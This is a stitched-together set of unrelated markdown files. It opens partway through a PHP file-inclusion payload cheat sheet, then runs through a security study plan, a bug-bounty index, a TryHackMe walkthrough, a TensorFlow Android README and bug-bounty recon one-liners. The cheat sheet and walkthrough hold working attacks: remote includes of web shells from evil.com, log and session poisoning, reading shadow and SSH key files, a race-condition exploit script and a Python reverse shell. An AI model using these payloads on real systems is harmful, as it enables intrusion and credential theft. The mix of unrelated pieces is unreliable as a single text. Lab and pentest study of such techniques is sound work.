http://example.com/index.php?page=../../../[ADD MORE]../../../../etc/passwd ``` ### Filter bypass tricks ```powershell http://example.com/index.php?page=....//....//etc/passwd http://example.com/index.php?page=..///////..////..//////etc/passwd http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd ``` ## Basic RFI Most of the filter bypasses from LFI section can be reused for RFI. ```powershell http://example.com/index.php?page=http://evil.com/shell.txt ``` ### Null byte ```powershell http://example.com/index.php?page=http://evil.com/shell.txt%00 ``` ### Double encoding ```powershell http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt ``` ### Bypass allow_url_include When `allow_url_include` and `allow_url_fopen` are set to `Off`. It is still possible to include a remote file on Windows box using the `smb` protocol. 1. Create a share open to everyone 2. Write a PHP code inside a file : `shell.php` 3. Include it `http://example.com/index.php?page=\\10.0.0.1\share\shell.php` ## LFI / RFI using wrappers ### Wrapper php://filter The part "php://filter" is case insensitive ```powershell http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php http://example.com/index.php?page=php://filter/convert.iconv.utf-8.utf-16/resource=index.php http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php ``` can be chained with a compression wrapper for large files. ```powershell http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd ``` NOTE: Wrappers can be chained multiple times using `|` or `/`: - Multiple base64 decodes: `php://filter/convert.base64-decoder|convert.base64-decode|convert.base64-decode/resource=%s` - deflate then base64encode (useful for limited character exfil): `php://filter/zlib.deflate/convert.base64-encode/resource=/var/www/html/index.php` ```powershell ./kadimus -u "http://example.com/index.php?page=vuln" -S -f "index.php%00" -O index.php --parameter page curl "http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php" | base64 -d > index.php ``` ### Wrapper zip:// ```python echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php; zip payload.zip payload.php; mv payload.zip shell.jpg; rm payload.php http://example.com/index.php?page=zip://shell.jpg%23payload.php ``` ### Wrapper data:// ```powershell http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4= NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>" ``` Fun fact: you can trigger an XSS and bypass the Chrome Auditor with : `http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+` ### Wrapper expect:// ```powershell http://example.com/index.php?page=expect://id http://example.com/index.php?page=expect://ls ``` ### Wrapper input:// Specify your payload in the POST parameters, this can be done with a simple `curl` command. ```powershell curl -X POST --data "<?php echo shell_exec('id'); ?>" "https://example.com/index.php?page=php://input%00" -k -v ``` Alternatively, Kadimus has a module to automate this attack. ```powershell ./kadimus -u "https://example.com/index.php?page=php://input%00" -C '<?php echo shell_exec("id"); ?>' -T input ``` ### Wrapper phar:// Create a phar file with a serialized object in its meta-data. ```php // create new Phar $phar = new Phar('test.phar'); $phar->startBuffering(); $phar->addFromString('test.txt', 'text'); $phar->setStub('<?php __HALT_COMPILER(); ? >'); // add object of any class as meta data class AnyClass {} $object = new AnyClass; $object->data = 'rips'; $phar->setMetadata($object); $phar->stopBuffering(); ``` If a file operation is now performed on our existing Phar file via the phar:// wrapper, then its serialized meta data is unserialized. If this application has a class named AnyClass and it has the magic method __destruct() or __wakeup() defined, then those methods are automatically invoked ```php class AnyClass { function __destruct() { echo $this->data; } } // output: rips include('phar://test.phar'); ``` NOTE: The unserialize is triggered for the phar:// wrapper in any file operation, `file_exists` and many more. ## LFI to RCE via /proc/*/fd 1. Upload a lot of shells (for example : 100) 2. Include http://example.com/index.php?page=/proc/$PID/fd/$FD, with $PID = PID of the process (can be bruteforced) and $FD the filedescriptor (can be bruteforced too) ## LFI to RCE via /proc/self/environ Like a log file, send the payload in the User-Agent, it will be reflected inside the /proc/self/environ file ```powershell GET vulnerable.php?filename=../../../proc/self/environ HTTP/1.1 User-Agent: <?=phpinfo(); ?> ``` ## LFI to RCE via upload If you can upload a file, just inject the shell payload in it (e.g : `<?php system($_GET['c']); ?>` ). ```powershell http://example.com/index.php?page=path/to/uploaded/file.png ``` In order to keep the file readable it is best to inject into the metadata for the pictures/doc/pdf ## LFI to RCE via upload (race) Worlds Quitest Let's Play" * Upload a file and trigger a self-inclusion. * Repeat 1 a shitload of time to: * increase our odds of winning the race * increase our guessing odds * Bruteforce the inclusion of /tmp/[0-9a-zA-Z]{6} * Enjoy our shell. ```python import itertools import requests import sys print('[+] Trying to win the race') f = {'file': open('shell.php', 'rb')} for _ in range(4096 * 4096): requests.post('http://target.com/index.php?c=index.php', f) print('[+] Bruteforcing the inclusion') for fname in itertools.combinations(string.ascii_letters + string.digits, 6): url = 'http://target.com/index.php?c=/tmp/php' + fname r = requests.get(url) if 'load average' in r.text: # <?php echo system('uptime'); print('[+] We have got a shell: ' + url) sys.exit(0) print('[x] Something went wrong, please try again') ``` ## LFI to RCE via phpinfo() PHPinfo() displays the content of any variables such as **$_GET**, **$_POST** and **$_FILES**. > By making multiple upload posts to the PHPInfo script, and carefully controlling the reads, it is possible to retrieve the name of the temporary file and make a request to the LFI script specifying the temporary file name. Use the script phpInfoLFI.py (also available at https://www.insomniasec.com/downloads/publications/phpinfolfi.py) Research from https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf ## LFI to RCE via controlled log file Just append your PHP code into the log file by doing a request to the service (Apache, SSH..) and include the log file. ```powershell http://example.com/index.php?page=/var/log/apache/access.log http://example.com/index.php?page=/var/log/apache/error.log http://example.com/index.php?page=/var/log/apache2/access.log http://example.com/index.php?page=/var/log/apache2/error.log http://example.com/index.php?page=/var/log/nginx/access.log http://example.com/index.php?page=/var/log/nginx/error.log http://example.com/index.php?page=/var/log/vsftpd.log http://example.com/index.php?page=/var/log/sshd.log http://example.com/index.php?page=/var/log/mail http://example.com/index.php?page=/var/log/httpd/error_log http://example.com/index.php?page=/usr/local/apache/log/error_log http://example.com/index.php?page=/usr/local/apache2/log/error_log ``` ### RCE via SSH Try to ssh into the box with a PHP code as username `<?php system($_GET["cmd"]);?>`. ```powershell ssh <?php system($_GET["cmd"]);?>@10.10.10.10 ``` Then include the SSH log files inside the Web Application. ```powershell http://example.com/index.php?page=/var/log/auth.log&cmd=id ``` ### RCE via Mail First send an email using the open SMTP then include the log file located at `http://example.com/index.php?page=/var/log/mail`. ```powershell root@kali:~# telnet 10.10.10.10. 25 Trying 10.10.10.10.... Connected to 10.10.10.10.. Escape character is '^]'. 220 straylight ESMTP Postfix (Debian/GNU) helo ok 250 straylight mail from: mail@example.com 250 2.1.0 Ok rcpt to: root 250 2.1.5 Ok data 354 End data with <CR><LF>.<CR><LF> subject: <?php echo system($_GET["cmd"]); ?> data2 . ``` In some cases you can also send the email with the `mail` command line. ```powershell mail -s "<?php system($_GET['cmd']);?>" www-data@10.10.10.10. < /dev/null ``` ## LFI to RCE via PHP sessions Check if the website use PHP Session (PHPSESSID) ```javascript Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/ Set-Cookie: user=admin; expires=Mon, 13-Aug-2018 20:21:29 GMT; path=/; httponly ``` In PHP these sessions are stored into /var/lib/php5/sess_[PHPSESSID] or /var/lib/php/session/sess_[PHPSESSID] files ```javascript /var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27. user_ip|s:0:"";loggedin|s:0:"";lang|s:9:"en_us.php";win_lin|s:0:"";user|s:6:"admin";pass|s:6:"admin"; ``` Set the cookie to `<?php system('cat /etc/passwd');?>` ```powershell login=1&user=<?php system("cat /etc/passwd");?>&pass=password&lang=en_us.php ``` Use the LFI to include the PHP session file ```powershell login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27 ``` ## LFI to RCE via credentials files This method require high privileges inside the application in order to read the sensitive files. ### Windows version First extract `sam` and `system` files. ```powershell http://example.com/index.php?page=../../../../../../WINDOWS/repair/sam http://example.com/index.php?page=../../../../../../WINDOWS/repair/system ``` Then extract hashes from these files `samdump2 SYSTEM SAM > hashes.txt`, and crack them with `hashcat/john` or replay them using the Pass The Hash technique. ### Linux version First extract `/etc/shadow` files. ```powershell http://example.com/index.php?page=../../../../../../etc/shadow ``` Then crack the hashes inside in order to login via SSH on the machine. Another way to gain SSH access to a Linux machine through LFI is by reading the private key file, id_rsa. If SSH is active check which user is being used `/proc/self/status` and `/etc/passwd` and try to access `/<HOME>/.ssh/id_rsa`. ## References * [OWASP LFI](https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion) * [HighOn.coffee LFI Cheat](https://highon.coffee/blog/lfi-cheat-sheet/) * [Turning LFI to RFI](https://l.avala.mp/?p=241) * [Is PHP vulnerable and under what conditions?](http://0x191unauthorized.blogspot.fr/2015/04/is-php-vulnerable-and-under-what.html) * [Upgrade from LFI to RCE via PHP Sessions](https://www.rcesecurity.com/2017/08/from-lfi-to-rce-via-php-sessions/) * [Local file inclusion tricks](http://devels-playground.blogspot.fr/2007/08/local-file-inclusion-tricks.html) * [CVV #1: Local File Inclusion - SI9INT](https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a) * [Exploiting Blind File Reads / Path Traversal Vulnerabilities on Microsoft Windows Operating Systems - @evisneffos](http://www.soffensive.com/2018/06/exploiting-blind-file-reads-path.html) * [Baby^H Master PHP 2017 by @orangetw](https://github.com/orangetw/My-CTF-Web-Challenges#babyh-master-php-2017) * [Чтение файлов => unserialize !](https://rdot.org/forum/showthread.php?t=4379) * [New PHP Exploitation Technique - 14 Aug 2018 by Dr. Johannes Dahse](https://blog.ripstech.com/2018/new-php-exploitation-technique/) * [It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It, Sam Thomas](https://github.com/s-n-t/presentations/blob/master/us-18-Thomas-It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It.pdf) * [CVV #1: Local File Inclusion - @SI9INT - Jun 20, 2018](https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a) * [Exploiting Remote File Inclusion (RFI) in PHP application and bypassing remote URL inclusion restriction](http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html?m=1)
# Security Study Plan A Practical Study Plan to become a successful cybersecurity engineer based on roles like Pentest, AppSec, Cloud Security, DevSecOps and so on with free/paid resources, tools and concepts to excel. **It will cover but not limited to:** 1. [Common Skills for Security Study Plan](common-skills-study-plan.md) 2. [AWS Security Study Plan](aws-security-study-plan.md) 3. [GCP Security Study Plan](gcp-security-study-plan.md) 4. [Azure Security Study Plan](azure-security-study-plan.md) 5. [DevSecOps Study Plan](devsecops-study-plan.md) 6. [Docker Security Study Plan](docker-security-study-plan.md) 7. [Kubernetes Security Study Plan](kubernetes-security-study-plan.md) 8. [Web Penetration Testing Study Plan](web-pentest-study-plan.md) 9. [Application Security Testing Plan](application-security-study-plan.md) 10. [API Security Study Plan](api-security-study-plan.md) 11. [Network Security Study Plan](network-security-study-plan.md) I got the idea of creating this repo after seeing [coding-interview-security](https://github.com/jwasham/coding-interview-university) as it echoes the journey that I went through to get into the full-time security role. >I created this study plan to help people who are looking for guidance and help to plan and prepare for a job specific skill sets. If you study 3-4 hours per day for next 6 months, you can literally clear high rewarding jobs provided you do lots of hands-on and go through each necessary topic/concept more than thrice and you are from tech background. This actually worked in my case. > >Please note that there are some topics that would be common for any listed security roles. Check [common-skills-study-plan](common-skills-study-plan.md) > >I will try my level best to add study references from the beginners perspective but will have even advanced level coverage too. > >All the best for your security journey! ## What is it? This is to give a study plan to prepare for a specific role. It is of course multi months hard work and dedication which needs a proper roadmap. Hence, this repo would be one point source for all your study plan. **Prerequisites:** - Ready to devote time on daily basis - from tech background, else it can take little more time but still possible to make a career in cybersecurity. - Never give up attitude - Hacker Mindset - Ready to explore on your own **Please note** that there are many job titles under each of these study plans, but I am keeping a generic study plan, so that you can tick out whichever you already know. This way you would know how much you know and how much you still need to learn to grow up the ladder. Check out the YouTube video on ["Cybersecurity Roadmap for Beginners"](https://www.youtube.com/watch?v=-qklv1WXdmo) and ["How to make a career in Cybersecurity"](https://www.youtube.com/watch?v=TPoI1vwcdxo&list=PLRTsCutScZnzN66sG_X9GyJFt-kkKoksi&index=5). Then, you will have a better idea on why to use it and how to use this study plan for your preparation. ## Why use it? If you want to work as a security engineer, these are the skills/topics/concepts you need to know and learn thoroughly.. When I started learning security concepts, everything was new to me, and I wasted lots of time on google search, youtube videos, articles etc. to figure out what's required and what not. I am still learning as cybersecurity is evolving, so we must. My target is to keep this repo up to date, of course with the help of wonderful learners like you. It takes time to be confident on some skills, treat it as a long plan. It may take months or sometimes a year too, but keep yourself motivated and don't stop learning. However, If you are familiar with a lot of topics already it will definitely take less time for you. ## How to use it? Everything below is like an outline, and you can tick out the items that you have already covered or know in order from top to bottom. I'm using [GitHub's special markdown flavor](https://guides.github.com/features/mastering-markdown/#GitHub-flavored-markdown), including tasks lists to track progress. As a Cybersecurity professional, I would [recommend you to learn git](https://www.udemy.com/course/git-basics-for-everyone) and clone this repo for your personal learning purpose. ## Update your resume Before updating or creating a resume for job, please check: 1. What job title you are trying for? 2. Do you fall in that experience range? 3. Check what skills it is looking for? 4. Check for job location or is it remote(work from home/anywhere)? Now, prepare the resume based on above info and your skill sets. Try to be honest here. See, if you can finish your resume in 1-2 pages. Check 1 page resume from below links: 1. [One page resume template from zety.com](https://zety.com/blog/one-page-resume-templates) 2. [Easy Resume](https://www.easyresume.io/) 3. [Various Security Resume sample from qwikresume.com](https://www.qwikresume.com/resume-samples/security-engineer/) 4. [How To Write a Security Engineer Resume (With Example)](How To Write a Security Engineer Resume (With Example)) 5. [Network Security Engineer Sample](https://enhancv.com/resume-examples/network-security-engineer/) 6. [Cloud Security Engineer Resume](https://www.hireitpeople.com/resume-database/68-network-and-systems-administrators-resumes/138883-cloud-security-engineer-resume) 7. [AWS Security Engineer Resume](https://www.livecareer.com/resume-search/r/aws-solutions-architect-cloud-security-engineer-dfe9b3bd87d04311bcb32119da547271) 8. [Lead DevSecOps Resume Example](https://www.livecareer.com/resume-search/r/lead-devsecops-engineer-53a226a3bebc4987af0dea7ce0c6740b) 9. [Sr. DevSecOps Engineer Resume Example](https://www.livecareer.com/resume-search/r/sr-devsecops-engineer-81ad059140cf43fda69e77d614d65685) 10. [Penetration Tester Consultant Resume Sample](https://www.livecareer.com/resume-search/r/penetration-tester-consultant-25926a15cbac482883f8d00d26da0d86) ## Finding the right job You might see hundreds of job openings, some may be from your dream company. But, once you closely look it doesn't match with your skills. It seems job title was little misleading and more of a generic description. Like security researcher or security analyst are just few examples. So, finetune and narrow down the job search with below websites but not limited to: 1. Which job title you are targeting? 2. What skills you have vs what skills JD requires? 3. Years of experience (range) is matching? Now search or subscribe to below job portal: 1. Linkedin. Yes, now a days it's job alert setting does a better job in finding the right job for you. 2. Naukri.com (Mostly in Asian countries) 3. indeed.com 4. monster.com 5. instahyre.com 6. cutshort.io 7. [Null Jobs Community](https://jobs.null.community/) 8. [Cybersecurity Jobs](https://www.cybersecurityjobs.com/) 9. [Interactive way to find jobs, skills, salary etc.](https://www.cyberseek.org/pathway.html) ## Interview Preparation You can start preparing for the job interview once you have solid knowledge as per the checklist for given role(s). There are few common security questions which you should have a look at it: 1. [Cybersecurity Interview Questions and Answers - Youtube](https://www.youtube.com/watch?v=q5pQ_YtJWpA) 2. [Cybersecurity Questions and Answers by Springboard](https://www.springboard.com/blog/cybersecurity/25-cybersecurity-job-interview-questions-and-answers/) 3. [Cybersecurity Questions and Answers form indeed](https://in.indeed.com/career-advice/interviewing/cyber-security-interview-questions) 4. [100+ Q&A for Cybersecurity domain from guru99](https://www.guru99.com/cyber-security-interview-questions.html) ### Common Interview Questions * How you keep updated yourself in the security domain? * What would you do typically at the first day of your job? * What personal achievement are you most proud of? * What was your last tough vulnerability that you found? * Why should we hire you? * What did you learn in last 6 months and how was it relevant to your career/project? * Where do you see after 5 years working with this organization? ## ToDo Updates - [x] Common Security Skills for Cybersecurity study plan - [x] AWS Security Study Plan - [x] Web Penetration Testing Study Plan - [x] Application Security Study Plan - [ ] API Security Study Plan - *<span style="color:orange;">In Progress...</span>* - [ ] GCP Security Study Plan - [ ] DevSecOps Study Plan - [ ] Network Security Study Plan - [ ] Docker Security Study Plan - [ ] Kubernetes Security Study Plan - [ ] Azure Security Study Plan You can check [some common answers from here](https://ayedot.com/119/MiniBlog/General-Interview-Questions-and-their-Answers-for-Tech-Jobs) ## Let's contribute and grow this repo together **Want to contribute? Please [fork the repo](https://github.com/jassics/security-study-plan/fork) and [send PR for review](https://github.com/jassics/security-study-plan/pulls)**
# 100 Bug Bounty Secrets I'm going to reveal a hundred secrets of bug bounty! ------- Secret | Topic | My Tweet ------- | ------- | ------- **01** | [Top 10 Automatic Recon Tools](secrets/secret01.md) | [#Secret01](https://twitter.com/MeAsHacker_HNA/status/1501457590638845953) **02** | [Bug Bounty with One-Line Bash Scripts](secrets/secret02.md) | [#Secret02](https://twitter.com/MeAsHacker_HNA/status/1504009812417331203) **03** | [6 Questions that Guarantee your Bounty](secrets/secret03.md) | [#Secret03](https://twitter.com/MeAsHacker_HNA/status/1526073303026343937) **04** | [Dork Tools & Collection Lists](secrets/secret04.md) | [#Secret04](https://twitter.com/MeAsHacker_HNA/status/1526799766914580482) **05** | [20 Top Videos to Master Recon 👑](secrets/secret05.md) | [#Secret05](https://twitter.com/MeAsHacker_HNA/status/1528680753449603075) **06** | [8 Awesome 2FA Bypass Techniques 🗝️](secrets/secret06.md) | [#Secret06](https://twitter.com/MeAsHacker_HNA/status/1533789947425062914) **07** | [7 Security Response Headers Every Security Tester Should Know ⚡️](secrets/secret07.md) | [#Secret07](https://twitter.com/MeAsHacker_HNA/status/1539151506363912193) **08** | [Everything you need to know about CSP Header 🔬](secrets/secret08.md) | [#Secret08](https://twitter.com/MeAsHacker_HNA/status/1542136846720929792) **09** | [Fuzzing With Custom Wordlists ⚒️](secrets/secret09.md) | [#Secret09](https://twitter.com/MeAsHacker_HNA/status/1561592256745832449) **10** | [How to find Origin IP Automatically 🔭](secrets/secret10.md) | [#Secret10](https://twitter.com/MeAsHacker_HNA/status/1564148263455965184) **11** | [13 Browser Extensions that Every Hunter Needs](secrets/secret11.md) | [#Secret11](https://twitter.com/MeAsHacker_HNA/status/1569558995530141696) **12** | [Subdomain Enumeration Techniques 🔮](secrets/secret12.md) | [#Secret12](https://twitter.com/MeAsHacker_HNA/status/1635170395224702976) **13** | [Firing 8 Account Takeover Methods 🔥](secrets/secret13.md) | [#Secret13](https://twitter.com/MeAsHacker_HNA/status/1660658896778698753) **14** | [How to use Burp Suite Like a PRO? 🚬](secrets/secret14.md) | [#Secret14](https://twitter.com/MeAsHacker_HNA/status/1663801196342304768) </br>&nbsp; ## Support You can Follow [me](https://twitter.com/MeAsHacker_HNA) on twitter or buy me a [Coffee](https://buymeacoffee.com/NafisiAslH)
# The Cod Caper - Help me out! :) no answer needed - How many ports are open on the target machine? - `scilla port -target <TARGET_IP>` - `*` - What is the http-title of the web server? - `nmap -A -p 80 <TARGET_IP>` - `Apache2 ******************` - What version is the ssh service? - `nmap -A -p 22 <TARGET_IP>` - `*************************` - What is the version of the web server? - `Apache/*.*.**` - What is the name of the important file on the server? - `gobuster dir -u <TARGET_IP> -w /usr/share/seclists/Discovery/Web-Content/big.txt -x "php,txt"` - `a***********.***` - What is the admin username? - `sqlmap -u http://<TARGET_IP>/**************.php --forms --dump` - `********` - What is the admin password? - `**********` - How many forms of SQLI is the form vulnerable to? - `*` - How many files are in the current directory? - `ls` - `*` - Do I still have an account - `***` - What is my ssh password? - `nc -lvnp 1234` - `python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<YOUR_IP>",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'` - `cd /home` - `cd pingu/.ssh` - `cat id_rsa` - Copy the private key - `chmod 600 id_rsa` - `ssh pingu@<TARGET_IP> -i id_rsa` - We need a pwd anyway. - `find / -name *pass* 2>/dev/null` - `cd ***/******/***` - SSH with password. - `***********` - What is the interesting path of the interesting suid file - `wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh` - `sudo python -m http.server` - `wget http://<YOUR_IP>:8000/LinEnum.sh` - `chmod +x LinEnum.sh` - `./LinENum.sh` - `/***/******/****` - Read the above :) no answer needed - Woohoo! no answer needed - Even more woohoo! no answer needed - What is the root password! - Copy the root hash inside a file called `hash` - `hashcat -m 1800 hash --wordlist /usr/share/wordlists/rockyou.txt --force` - `****2****` - You helped me out! no answer needed
# TensorFlow Android Camera Demo This folder contains an example application utilizing TensorFlow for Android devices. ## Description The demos in this folder are designed to give straightforward samples of using TensorFlow in mobile applications. Inference is done using the [TensorFlow Android Inference Interface](../../../tensorflow/contrib/android), which may be built separately if you want a standalone library to drop into your existing application. Object tracking and YUV -> RGB conversion is handled by libtensorflow_demo.so. A device running Android 5.0 (API 21) or higher is required to run the demo due to the use of the camera2 API, although the native libraries themselves can run on API >= 14 devices. ## Current samples: 1. [TF Classify](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/examples/android/src/org/tensorflow/demo/ClassifierActivity.java): Uses the [Google Inception](https://arxiv.org/abs/1409.4842) model to classify camera frames in real-time, displaying the top results in an overlay on the camera image. 2. [TF Detect](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/examples/android/src/org/tensorflow/demo/DetectorActivity.java): Demonstrates a model based on [Scalable Object Detection using Deep Neural Networks](https://arxiv.org/abs/1312.2249) to localize and track people in the camera preview in real-time. 3. [TF Stylize](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/examples/android/src/org/tensorflow/demo/StylizeActivity.java): Uses a model based on [A Learned Representation For Artistic Style] (https://arxiv.org/abs/1610.07629) to restyle the camera preview image to that of a number of different artists. <img src="sample_images/classify1.jpg" width="30%"> <img src="sample_images/stylize1.jpg" width="30%"> <img src="sample_images/detect1.jpg" width="30%"> ## Prebuilt APK: If you just want the fastest path to trying the demo, you may download the nightly build [here](https://ci.tensorflow.org/view/Nightly/job/nightly-android/). Expand the "View" and then the "out" folders under "Last Successful Artifacts" to find tensorflow_demo.apk. Also available are precompiled native libraries that you may drop into your own applications. See [tensorflow/contrib/android/README.md](../../../tensorflow/contrib/android/README.md) for more details. ## Running the Demo Once the app is installed it can be started via the "TF Classify", "TF Detect" and "TF Stylize" icons, which have the orange TensorFlow logo as their icon. While running the activities, pressing the volume keys on your device will toggle debug visualizations on/off, rendering additional info to the screen that may be useful for development purposes. ## Building the Demo from Source Pick your preferred approach below. At the moment, we have full support for Bazel, and partial support for gradle, cmake, make, and Android Studio. As a first step for all build types, clone the TensorFlow repo with: ``` git clone --recurse-submodules https://github.com/tensorflow/tensorflow.git ``` Note that `--recurse-submodules` is necessary to prevent some issues with protobuf compilation. ### Bazel NOTE: Bazel does not currently support building for Android on Windows. Full support for gradle/cmake builds is coming soon, but in the meantime we suggest that Windows users download the [prebuilt binaries](https://ci.tensorflow.org/view/Nightly/job/nightly-android/) instead. ##### Install Bazel and Android Prerequisites Bazel is the primary build system for TensorFlow. To build with Bazel, it and the Android NDK and SDK must be installed on your system. 1. Get the recommended Bazel version listed in [os_setup.html](https://www.tensorflow.org/versions/master/get_started/os_setup.html#source) 2. The Android NDK is required to build the native (C/C++) TensorFlow code. The current recommended version is 12b, which may be found [here](https://developer.android.com/ndk/downloads/older_releases.html#ndk-12b-downloads). 3. The Android SDK and build tools may be obtained [here](https://developer.android.com/tools/revisions/build-tools.html), or alternatively as part of [Android Studio](https://developer.android.com/studio/index.html). Build tools API >= 23 is required to build the TF Android demo (though it will run on API >= 21 devices). ##### Edit WORKSPACE The Android entries in [`<workspace_root>/WORKSPACE`](../../../WORKSPACE#L19-L32) must be uncommented with the paths filled in appropriately depending on where you installed the NDK and SDK. Otherwise an error such as: "The external label '//external:android/sdk' is not bound to anything" will be reported. Also edit the API levels for the SDK in WORKSPACE to the highest level you have installed in your SDK. This must be >= 23 (this is completely independent of the API level of the demo, which is defined in AndroidManifest.xml). The NDK API level may remain at 14. ##### Install Model Files (optional) The TensorFlow `GraphDef`s that contain the model definitions and weights are not packaged in the repo because of their size. They are downloaded automatically and packaged with the APK by Bazel via a new_http_archive defined in `WORKSPACE` during the build process, and by Gradle via download-models.gradle. **Optional**: If you wish to place the models in your assets manually, remove all of the `model_files` entries from the `assets` list in `tensorflow_demo` found in the `[BUILD](BUILD)` file. Then download and extract the archives yourself to the `assets` directory in the source tree: ```bash BASE_URL=https://storage.googleapis.com/download.tensorflow.org/models for MODEL_ZIP in inception5h.zip mobile_multibox_v1a.zip stylize_v1.zip do curl -L ${BASE_URL}/${MODEL_ZIP} -o /tmp/${MODEL_ZIP} unzip /tmp/${MODEL_ZIP} -d tensorflow/examples/android/assets/ done ``` This will extract the models and their associated metadata files to the local assets/ directory. If you are using Gradle, make sure to remove download-models.gradle reference from build.gradle after your manually download models; otherwise gradle might download models again and overwrite your models. ##### Build After editing your WORKSPACE file to update the SDK/NDK configuration, you may build the APK. Run this from your workspace root: ```bash bazel build -c opt //tensorflow/examples/android:tensorflow_demo ``` If you get build errors about protocol buffers, run `git submodule update --init` and make sure that you've modified your WORKSPACE file as instructed, then try building again. ##### Install Make sure that adb debugging is enabled on your Android 5.0 (API 21) or later device, then after building use the following command from your workspace root to install the APK: ```bash adb install -r bazel-bin/tensorflow/examples/android/tensorflow_demo.apk ``` ### Android Studio Android Studio may be used to build the demo in conjunction with Bazel. First, make sure that you can build with Bazel following the above directions. Then, look at [build.gradle](build.gradle) and make sure that the path to Bazel matches that of your system. At this point you can add the tensorflow/examples/android directory as a new Android Studio project. Click through installing all the Gradle extensions it requests, and you should be able to have Android Studio build the demo like any other application (it will call out to Bazel to build the native code with the NDK). ### CMake Full CMake support for the demo is coming soon, but for now it is possible to build the TensorFlow Android Inference library using [tensorflow/contrib/android/cmake](../../../tensorflow/contrib/android/cmake).
# Bug bounty ``` ffuf -w traversal.txt -u http://<domain>/FUZZ -mr "root" -mc 200,303,301,302,303,304,308,307,404,405,403 -c ``` # spider ``` gospider -q -s <domain> -o output -c 10 -d 1 ``` ``` findomain -t <domain> 2>/dev/null | httpx -silent | xargs -I@ sh -c 'ffuf -w path.txt -u @/FUZZ -t 100 -mc 200 -H "Content-Type: application/json" ``` ``` assetfinder <domain> | sed 's#*.# #g' | httpx -silent -threads 10 | xargs -I@ sh -c 'ffuf -w path.txt -u @/FUZZ -mc 200 -H "Content-Type: application/json" -t 150 -H "X-Forwarded-For:127.0.0.1"' ``` ``` wget -nv -nc https://chaos-data.projectdiscovery.io/playstation.zip ; unzip http://playstation.zip ; cat *.txt | httpx -silent -threads 300 | anew fullAlive; gospider -a -d 0 -S fullAlive -c 5 -t 100 -d 5 --blacklist black | egrep -o '(http|https)://[^/"]+' | anew httpSpider ``` unfurl --unique domains # cve's check ``` cat alive.txt | nuclei -t nuclei-templates/workflows | tee -a workflows. ``` # js file end points extrant ``` cat file.js | grep -aoP "(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))" | sort -u ``` # create own wordlist ``` echo "http://api.uber.com" | waybackurls | cut -d "/" -f 4,5 | sed 's/?.*//' | sort -u ``` # AndroidManifest ``` cat AndroidManifest.xml | grep -P '<(activity(-alias)?|service|receiver|provider)(?![^>]*exported="false")' ``` # Apk folder strings grep ``` grep -EHirn "accesskey|admin|aes|api_key|apikey|checkClientTrusted|crypt|http:|https:|password|pinning|secret|SHA256|SharedPreferences|superuser|token|X509TrustManager|github|api_secret|aws|s3|firebaseio.com" ./ ``` more-setJavaScriptEnabled, root, JavascriptInterface , MODE_WORLD_READABLE, MODE_WORLD_WRITEABLE, Pinner, checkServerTrusted, api_secret, api/v1, api/v2 # Apk folder grep api ``` grep -EHirn "api_secret|api/v1|api/v2" ./ ``` # Apk folder url's grep ``` grep -Phro "(https?://)[\w\.-/]+[\"'\`]" uberApk/ | sed 's#"##g' | anew | grep -v "w3\|android\|github\|http://schemas.android\|google\|http://goo.gl" ./ ``` # Android deep link ``` grep -rnF "deeplinkschema://" ./ ``` # Android subdomain ``` grep -i -rnw 'app_landing_page_domain' ``` # Android firebase ``` for apk in $(ls *.apk ); do urll=`strings $apk | grep -i fire | grep -i http | cut -d':' -f2`; curl -sb --url "https:$urll/.json" | jq | tee "${apk%.*}".json ; done ``` # Android api keys ``` grep -RP '(?<![A-Za-z0-9/+=])[A-Za-z0-9/+=]{40}(?![A-Za-z0-9/+=])' * ```
